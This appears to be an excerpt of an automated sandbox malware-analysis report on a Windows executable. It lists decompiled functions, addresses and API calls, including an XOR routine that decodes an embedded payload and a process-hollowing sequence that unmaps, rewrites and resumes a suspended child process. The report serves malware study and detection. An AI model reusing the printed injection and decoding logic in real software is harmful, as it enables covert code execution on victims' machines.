				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}





    0x00405e03
    0x00405e0a
    0x00405e0f
    0x00405e15
    0x00405e1a

    APIs
    • GlobalHandle.KERNEL32 ref: 00405E03
    • GlobalUnWire.KERNEL32(00000000), ref: 00405E0A
    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00405E0F
    • GlobalFix.KERNEL32(00000000), ref: 00405E15
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00408B80, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74
    C-Code - Quality: 72%
    			E00408B80(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0x408c5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E00403E88(__edx);
				_v24 =  *((intOrPtr*)(_a4 - 0xe));
				_v22 =  *((intOrPtr*)(_a4 - 0x10));
				_v18 =  *((intOrPtr*)(_a4 - 0x12));
				if(_t63 > 2) {
					E00403F20( &_v8, 0x408c80);
				} else {
					E00403F20( &_v8, 0x408c74);
				}
				_t32 = E00404348(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E004040F8(_t49, 0x100,  &_v280);
					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E004043A8( *_t49, E00404148( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(E00408C65);
				return E00403E88( &_v8);
			}













    0x00408b8d
    0x00408b90
    0x00408b92
    0x00408b96
    0x00408b97
    0x00408b9c
    0x00408b9f
    0x00408ba4
    0x00408bb0
    0x00408bbb
    0x00408bc6
    0x00408bcd
    0x00408be6
    0x00408bcf
    0x00408bd7
    0x00408bd7
    0x00408bfa
    0x00408c13
    0x00408c22
    0x00408c28
    0x00408c43
    0x00408c43
    0x00408c28
    0x00408c4a
    0x00408c4d
    0x00408c50
    0x00408c5d

    APIs
    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00408C5E), ref: 00408C06
    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 00408C0C
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 0041844E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
    C-Code - Quality: 50%
    			E0041844E() {
				struct _SYSTEM_INFO _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr* _t15;
				void* _t31;
				signed int _t34;
				void* _t38;
				void* _t39;
				void* _t45;
				void* _t51;

				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_push(_t45);
				_push(0x418517);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45 + 0xffffffd0;
				GetSystemInfo( &_v40);
				_t34 = 0;
				_t31 = 0x39a91;
				_t15 = 0x41944c;
				do {
					if(_t34 == 0x20) {
						_t34 = 0;
					}
					_t5 = (_t34 & 0x000000ff) + 0x452ee0; // 0x8845645c
					_t30 = ( *_t15 - _t34 ^  *_t5) + _t34;
					 *_t15 = ( *_t15 - _t34 ^  *_t5) + _t34;
					_t34 = _t34 + 1;
					_t15 = _t15 + 1;
					_t31 = _t31 - 1;
				} while (_t31 != 0);
				L5:
				_push("h`JE");
				_push("-t ");
				_push(0);
				E004070E8( &_v48, _t51, _v40.dwNumberOfProcessors >> 1);
				_push(_v48);
				_push(0x41853c);
				_push( *0x454a5c);
				E00404208();
				_push(_v44);
				E004029A4(0,  &_v52);
				_pop(_t38);
				E00417F5C(_v52, _t30, 0x41944c, _t38, _t39, _t42, _t51);
				goto L5;
			}














    0x0041845a
    0x0041845d
    0x00418460
    0x00418465
    0x00418466
    0x0041846b
    0x0041846e
    0x00418475
    0x0041847a
    0x0041847c
    0x00418481
    0x00418486
    0x00418489
    0x0041848b
    0x0041848b
    0x00418499
    0x0041849f
    0x004184a1
    0x004184a3
    0x004184a4
    0x004184a5
    0x004184a5
    0x004184a8
    0x004184a8
    0x004184ad
    0x004184b9
    0x004184be
    0x004184c3
    0x004184c6
    0x004184cb
    0x004184d9
    0x004184e1
    0x004184e7
    0x004184f4
    0x004184f5
    0x00000000

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00418450, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59
    C-Code - Quality: 53%
    			E00418450() {
				struct _SYSTEM_INFO _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr* _t15;
				void* _t30;
				signed int _t33;
				void* _t37;
				void* _t38;
				intOrPtr _t42;
				void* _t47;

				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_push(0x418517);
				_push( *[fs:eax]);
				 *[fs:eax] = _t42;
				GetSystemInfo( &_v40);
				_t33 = 0;
				_t30 = 0x39a91;
				_t15 = 0x41944c;
				do {
					if(_t33 == 0x20) {
						_t33 = 0;
					}
					_t5 = (_t33 & 0x000000ff) + 0x452ee0; // 0x8845645c
					_t29 = ( *_t15 - _t33 ^  *_t5) + _t33;
					 *_t15 = ( *_t15 - _t33 ^  *_t5) + _t33;
					_t33 = _t33 + 1;
					_t15 = _t15 + 1;
					_t30 = _t30 - 1;
				} while (_t30 != 0);
				L4:
				_push("h`JE");
				_push("-t ");
				_push(0);
				E004070E8( &_v48, _t47, _v40.dwNumberOfProcessors >> 1);
				_push(_v48);
				_push(0x41853c);
				_push( *0x454a5c);
				E00404208();
				_push(_v44);
				E004029A4(0,  &_v52);
				_pop(_t37);
				E00417F5C(_v52, _t29, 0x41944c, _t37, _t38, _t40, _t47);
				goto L4;
			}














    0x0041845a
    0x0041845d
    0x00418460
    0x00418466
    0x0041846b
    0x0041846e
    0x00418475
    0x0041847a
    0x0041847c
    0x00418481
    0x00418486
    0x00418489
    0x0041848b
    0x0041848b
    0x00418499
    0x0041849f
    0x004184a1
    0x004184a3
    0x004184a4
    0x004184a5
    0x004184a5
    0x004184a8
    0x004184a8
    0x004184ad
    0x004184b9
    0x004184be
    0x004184c3
    0x004184c6
    0x004184cb
    0x004184d9
    0x004184e1
    0x004184e7
    0x004184f4
    0x004184f5
    0x00000000

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 0040BC54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
    C-Code - Quality: 83%
    			E0040BC54(void* __edx) {
				void* _t6;
				void* _t13;
				void* _t17;
				void* _t20;
				void* _t21;
				void* _t22;

				_t17 = __edx;
				if(__edx != 0) {
					_t22 = _t22 + 0xfffffff0;
					_t6 = E00403404(_t6, _t21);
				}
				_t20 = _t6;
				E004030E4(0);
				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
				 *(_t20 + 0x18) = 0xffffffff;
				 *((intOrPtr*)(_t20 + 0x20)) = E004030E4(1);
				_t13 = _t20;
				if(_t17 != 0) {
					E0040345C(_t13);
					_pop( *[fs:0x0]);
				}
				return _t20;
			}









    0x0040bc54
    0x0040bc58
    0x0040bc5a
    0x0040bc5d
    0x0040bc5d
    0x0040bc64
    0x0040bc6a
    0x0040bc6f
    0x0040bc83
    0x0040bc93
    0x0040bc96
    0x0040bca9
    0x0040bcac
    0x0040bcb0
    0x0040bcb2
    0x0040bcb7
    0x0040bcbe
    0x0040bcc5

    APIs
    • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC7E
    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC8E
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 004179B4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9
    C-Code - Quality: 100%
    			E004179B4(void* __eax) {
				void* _t3;

				L0040C518();
				if(__eax != 0) {
					_t3 = E0040A56C("WSACleanup", 1);
					E0040386C();
					return _t3;
				}
				return __eax;
			}




    0x004179b4
    0x004179bb
    0x004179c9
    0x004179ce
    0x00000000
    0x004179ce
    0x004179d3

    APIs
    • WSACleanup.WSOCK32(00417A06,00000000,00417A14), ref: 004179B4
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 0040F0A8, Relevance: 5.1, Strings: 4, Instructions: 85
    C-Code - Quality: 78%
    			E0040F0A8(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				void* _v8;
				char _v264;
				char _v520;
				char _v524;
				signed char _t47;
				intOrPtr* _t59;
				intOrPtr _t61;
				intOrPtr* _t75;
				void* _t78;

				_v524 = 0;
				_t75 = __edx;
				_t47 = __eax;
				_push(_t78);
				_push(0x40f1ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t78 + 0xfffffdf8;
				_t73 = __eax & 0x00000fff;
				if((__eax & 0x00000fff) > 0x14) {
					if(__eax != 0x100) {
						if(__eax != 0x101) {
							if(E0040F504(__eax,  &_v8) == 0) {
								E00407110( &_v524, 4);
								_t59 =  *0x4530ec; // 0x419128
								E00404194(_t75, _v524,  *_t59);
							} else {
								E00403064( *_v8,  &_v520);
								E004027B4( &_v520, 0x7fffffff, 2,  &_v264);
								E004040EC(__edx,  &_v264);
							}
						} else {
							E00403EDC(__edx, 0x40f1f4);
						}
					} else {
						E00403EDC(__edx, "String");
					}
				} else {
					E00403EDC(__edx,  *((intOrPtr*)(0x419358 + (_t73 & 0x0000ffff) * 4)));
				}
				if((_t47 & 0x00000020) != 0) {
					E00404194(_t75,  *_t75, "Array ");
				}
				if((_t47 & 0x00000040) != 0) {
					E00404194(_t75,  *_t75, "ByRef ");
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0040F1D5);
				return E00403E88( &_v524);
			}












    0x0040f0b6
    0x0040f0bc
    0x0040f0be
    0x0040f0c2
    0x0040f0c3
    0x0040f0c8
    0x0040f0cb
    0x0040f0d0
    0x0040f0d9
    0x0040f0f6
    0x0040f10e
    0x0040f12a
    0x0040f175
    0x0040f180
    0x0040f18a
    0x0040f12c
    0x0040f13e
    0x0040f153
    0x0040f160
    0x0040f160
    0x0040f110
    0x0040f117
    0x0040f117
    0x0040f0f8
    0x0040f0ff
    0x0040f0ff
    0x0040f0db
    0x0040f0e7
    0x0040f0e7
    0x0040f192
    0x0040f19d
    0x0040f19d
    0x0040f1a5
    0x0040f1b0
    0x0040f1b0
    0x0040f1b7
    0x0040f1ba
    0x0040f1bd
    0x0040f1cd

    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 0041381C, Relevance: 5.1, Strings: 4, Instructions: 71
    C-Code - Quality: 82%
    			E0041381C(intOrPtr __eax, void* __ebx, char* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char* _t15;
				char* _t23;
				intOrPtr _t30;
				char _t31;
				intOrPtr _t39;
				intOrPtr _t42;
				void* _t45;

				_v12 = 0;
				_t23 = __edx;
				_push(_t45);
				_push(0x4138c2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45 + 0xfffffff8;
				_v8 = 0;
				if(__edx != 0) {
					_t39 = __eax;
					while( *_t23 != 0) {
						_t15 = _t23;
						while(1) {
							_t31 =  *_t23;
							if(_t31 == 0 || _t31 + 0xd3 - 2 < 0) {
								break;
							}
							_t23 = _t23 + 1;
						}
						E00403F78( &_v12, _t23 - _t15, _t15);
						_t42 = E004165D4(_t39, _t23 - _t15, _v12);
						if(_t42 == 0 && E00406E50(_v12, 0x4138dc) != 0) {
							_t42 = _t39;
						}
						if(_t42 != 0) {
							if( *_t23 == 0x2e) {
								_t23 = _t23 + 1;
							}
							if( *_t23 == 0x2d) {
								_t23 = _t23 + 1;
							}
							if( *_t23 == 0x3e) {
								_t23 = _t23 + 1;
							}
							_t39 = _t42;
							continue;
						}
						goto L19;
					}
					_v8 = _t39;
				}
				L19:
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(E004138C9);
				return E00403E88( &_v12);
			}












    0x00413827
    0x0041382a
    0x00413830
    0x00413831
    0x00413836
    0x00413839
    0x0041383e
    0x00413843
    0x00413845
    0x004138a4
    0x00413849
    0x0041384e
    0x0041384e
    0x00413852
    0x00000000
    0x00000000
    0x0041384d
    0x0041384d
    0x00413864
    0x00413873
    0x00413877
    0x0041388a
    0x0041388a
    0x0041388e
    0x00413893
    0x00413895
    0x00413895
    0x00413899
    0x0041389b
    0x0041389b
    0x0041389f
    0x004138a1
    0x004138a1
    0x004138a2
    0x00000000
    0x004138a2
    0x00000000
    0x0041388e
    0x004138a9
    0x004138a9
    0x004138ac
    0x004138ae
    0x004138b1
    0x004138b4
    0x004138c1

    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 0041498C, Relevance: 5.0, Strings: 4, Instructions: 50
    C-Code - Quality: 96%
    			E0041498C(void* __eax, void* __ecx, void* __edx) {
				signed int _t7;
				void* _t8;
				void* _t17;
				void* _t29;

				_push(__ecx);
				_t29 = __edx;
				_t17 = __eax;
				_t7 = E004155CC(__ecx) & 0x0000007f;
				if(_t7 > 0xd) {
					L7:
					_t8 = E00413A2C();
				} else {
					_t1 = _t7 + E004149B3; // 0x5
					switch( *((intOrPtr*)( *_t1 * 4 +  &M004149C1))) {
						case 0:
							goto L7;
						case 1:
							E00413F54(_t17, 1, _t30);
							E00403F78(_t29,  *_t30, 0);
							_t8 = E00413F54(_t17,  *_t30, E004043A0(_t29));
							goto L8;
						case 2:
							__eax = __esi;
							__edx = 0x414a58;
							__eax = E00403EDC(__esi, 0x414a58);
							goto L8;
						case 3:
							__eax = __esi;
							__edx = 0x414a68;
							__eax = E00403EDC(__esi, 0x414a68);
							goto L8;
						case 4:
							__eax = __esi;
							__edx = 0x414a78;
							__eax = E00403EDC(__esi, 0x414a78);
							goto L8;
						case 5:
							__eax = __esi;
							__edx = 0x414a84;
							__eax = E00403EDC(__esi, 0x414a84);
							goto L8;
					}
				}
				L8:
				return _t8;
			}







    0x0041498e
    0x0041498f
    0x00414991
    0x0041499a
    0x004149a0
    0x00414a44
    0x00414a44
    0x004149a6
    0x004149a6
    0x004149ac
    0x00000000
    0x00000000
    0x00000000
    0x004149e2
    0x004149f0
    0x00414a05
    0x00000000
    0x00000000
    0x00414a0c
    0x00414a0e
    0x00414a13
    0x00000000
    0x00000000
    0x00414a1a
    0x00414a1c
    0x00414a21
    0x00000000
    0x00000000
    0x00414a28
    0x00414a2a
    0x00414a2f
    0x00000000
    0x00000000
    0x00414a36
    0x00414a38
    0x00414a3d
    0x00000000
    0x00000000
    0x004149ac
    0x00414a49
    0x00414a4c

    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 0040AC28, Relevance: 5.0, Strings: 4, Instructions: 28
    C-Code - Quality: 100%
    			E0040AC28() {
				intOrPtr* _t5;
				intOrPtr* _t6;
				intOrPtr* _t7;
				intOrPtr* _t8;
				intOrPtr* _t9;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t16;
				intOrPtr* _t17;
				intOrPtr* _t18;

				_t12 =  *0x452f70; // 0x405e70
				 *0x45478c = E0040A628(_t12, 1);
				_t13 =  *0x453040; // 0x405ef0
				 *0x454790 = E0040A628(_t13, 1);
				_t5 =  *0x452f34; // 0x454008
				 *_t5 = 0x40a7a4;
				_t6 =  *0x452fa8; // 0x454004
				 *_t6 = E0040AC18;
				_t7 =  *0x452f64; // 0x45401c
				_t16 =  *0x406188; // 0x4061d4
				 *_t7 = _t16;
				_t8 =  *0x452f98; // 0x45400c
				 *_t8 = E0040A968;
				_t9 =  *0x452fac; // 0x454010
				 *_t9 = E0040AB4C;
				_t17 =  *0x453054; // 0x454020
				 *_t17 = E0040A8B4;
				_t18 =  *0x452f24; // 0x454028
				 *_t18 = E0040A8D0;
				return E0040A8D0;
			}













    0x0040ac28
    0x0040ac3a
    0x0040ac3f
    0x0040ac51
    0x0040ac56
    0x0040ac5b
    0x0040ac61
    0x0040ac66
    0x0040ac6c
    0x0040ac71
    0x0040ac77
    0x0040ac79
    0x0040ac7e
    0x0040ac84
    0x0040ac89
    0x0040ac94
    0x0040ac9a
    0x0040aca1
    0x0040aca7
    0x0040aca9

    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd

    Analysis Process: obtG43AWHP.exe PID: 3232 Parent PID: 3220

    Executed Functions

    Function 0028E080, Relevance: 16.7, APIs: 11, Instructions: 244
    APIs
    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0028E0C6
    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0028E0DC
    • CreateProcessA.KERNEL32(?,00000000), ref: 0028E1C2
    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0028E1F0
    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0028E235
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 0028E271
    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0028E297
    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 0028E306
    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0028E32C
    • SetThreadContext.KERNEL32(00000000,?), ref: 0028E34E
    • ResumeThread.KERNELBASE(00000000), ref: 0028E35A
    Memory Dump Source
    • Source File: 00000009.00000002.1500598486.0028D000.00000040.sdmp, Offset: 0028D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_28d000_obtG43AWHP.jbxd
    Function 0028E380, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
    APIs
    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0028E493
    • PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0028E4B6
      • Part of subcall function 0028E080: VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0028E0C6
      • Part of subcall function 0028E080: GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0028E0DC
      • Part of subcall function 0028E080: CreateProcessA.KERNEL32(?,00000000), ref: 0028E1C2
      • Part of subcall function 0028E080: VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0028E1F0
    Strings
    Memory Dump Source
    • Source File: 00000009.00000002.1500598486.0028D000.00000040.sdmp, Offset: 0028D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_28d000_obtG43AWHP.jbxd
    Function 0028E510, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
    APIs
    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 0028E54C
      • Part of subcall function 0028E380: CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0028E493
      • Part of subcall function 0028E380: PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0028E4B6
    Strings
    Memory Dump Source
    • Source File: 00000009.00000002.1500598486.0028D000.00000040.sdmp, Offset: 0028D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_28d000_obtG43AWHP.jbxd

    Non-executed Functions

    Function 0028DFB2, Relevance: .1, Instructions: 61
    Memory Dump Source
    • Source File: 00000009.00000002.1500598486.0028D000.00000040.sdmp, Offset: 0028D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_28d000_obtG43AWHP.jbxd

    Analysis Process: obtG43AWHP.exe PID: 3248 Parent PID: 3232

    Executed Functions

    Function 00404FC0, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184
    C-Code - Quality: 65%
    			E00404FC0(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x4050c5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00404E08( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040522C, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E004050CC);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L00401248();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401250();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L00401248();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L00401248();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L00401248();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
